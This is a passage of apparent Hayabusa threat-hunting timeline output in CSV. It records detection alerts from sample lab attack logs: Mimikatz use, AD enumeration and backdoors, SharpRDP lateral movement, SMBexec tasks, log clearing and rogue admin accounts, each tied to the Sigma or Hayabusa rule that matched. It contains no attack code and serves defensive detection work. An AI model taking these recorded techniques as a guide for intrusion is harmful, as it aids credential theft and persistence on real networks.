+09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59920 : LogonID: 0x64f5bf1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.365 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59921 : LogonID: 0x64f5c04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.714 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59993 : LogonID: 0x64f5c7f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.723 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60017 : LogonID: 0x64f5cb1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.725 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60018 : LogonID: 0x64f5cc8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.728 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60019 : LogonID: 0x64f5cf4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.825 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:52.909 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ATACORE01$ : Workstation: - : IP Address: 10.23.42.30 : Port: 62476 : LogonID: 0x64f5ef5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:58:11.977 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59641 : LogonID: 0x64f6471,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:58:11.981 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$ : Workstation: - : IP Address: fe80::1cae:5aa4:9d8d:106a : Port: 51370 : LogonID: 0x64f64a3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:58:12.004 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59643 : LogonID: 0x64f64ca,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59644 : LogonID: 0x64f64e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59645 : LogonID: 0x64f64f3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 06:22:31.163 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" -2020-07-10 06:25:41.773 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" -2020-07-10 07:00:14.124 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:14.195 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:17.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:28.307 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:28.458 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:31.218 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:42.919 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:43.042 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:45.589 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:48.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\windows\system32\notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:01.154 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:01.337 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:03.898 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:03.899 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:03.900 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:03.902 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:06.427 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:02:42.085 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:05:58.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:07.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:14.112 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:14.229 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:20.184 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:07:33.800 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 19:20:34.910 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: rdpclip : Path: C:\Windows\System32\rdpclip.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\svchost.exe -k NetworkService -s TermService,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:35.886 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:35.913 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""\\tsclient\c\temp\stack\a.exe"" : Path: \\tsclient\c\temp\stack\a.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-10 19:20:58.942 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx -2020-07-11 22:21:11.693 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx -2020-07-11 22:21:11.693 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx -2020-07-11 22:21:17.514 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx -2020-07-11 22:21:17.514 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx -2020-07-11 22:21:18.640 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx -2020-07-11 22:21:18.640 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx -2020-07-12 02:16:42.576 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx -2020-07-12 02:16:42.592 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx -2020-07-12 02:16:50.984 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx -2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx -2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx -2020-07-12 02:18:01.228 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx -2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx -2020-07-12 06:49:56.318 +09:00,fs02.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx -2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss : SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-4726 Fast created-deleted user.evtx -2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss : SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Admin like user created.evtx -2020-07-12 14:12:58.295 +09:00,jump01.offsec.lan,4720,medium,Local user account created,User: hacking-local-acct : SID:S-1-5-21-1470532092-3758209836-3742276719-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Local user created.evtx -2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-1470532092-3758209836-3742276719-1001 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-User added to local admin groups.evtx -2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-1470532092-3758209836-3742276719-1001 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-4733-Quick added-removed user from local group.evtx -2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1158 : Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx -2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1158 : Group: Group02 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx -2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: 